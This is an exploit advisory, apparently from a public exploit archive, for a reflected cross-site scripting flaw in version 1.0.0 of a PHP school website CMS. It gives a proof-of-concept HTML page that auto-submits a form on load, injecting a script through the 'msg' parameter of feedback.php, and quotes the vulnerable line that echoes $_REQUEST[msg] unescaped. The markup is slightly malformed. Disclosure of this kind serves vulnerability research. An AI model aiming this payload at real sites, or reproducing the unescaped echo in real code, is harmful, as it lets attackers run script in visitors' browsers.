___________________________________________________
|
| Exploit Title: school cms Cross Site Scripting
| Exploit Author: Ashiyane Digital security Team
| Vendor Homepage : https://www.sourcecodester.com/php/5400/school-website-cms.html
| Software Link: https://www.sourcecodester.com/sites/default/files/download/arukumar/school_cms.zip
| Version: 1.0.0
| Date: 2017-11-18
| Category: Webapps
| Language: PHP
| Tested on: Kali-Linux / FireFox
|__________________________________________________
|
| Exploit :
|
|    <html>
|    <body onload="document.exploit.submit()">
|    <form  method="get" action="http://TARGET/PATH/feedback.php"
|    <input type="hidden" name="msg" value="1"/><script>alert(`M.R.S.L.Y`)</script>" />
|    </form>
|    </body>
|    </html>
|__________________________________________________
|
| Vulnerable method :
|    $_GET
|
| Vulnerable File:
|    feedback.php
|
| Vulnerable code:
|
|    line 203 :
|              <td id="error" style="color:#FF0000;"><?PHP echo "<font color=#FF0000>$_REQUEST[msg]</font>"; ?></td>
|__________________________________________________
|
|    Discovered By : M.R.S.L.Y
|__________________________________________________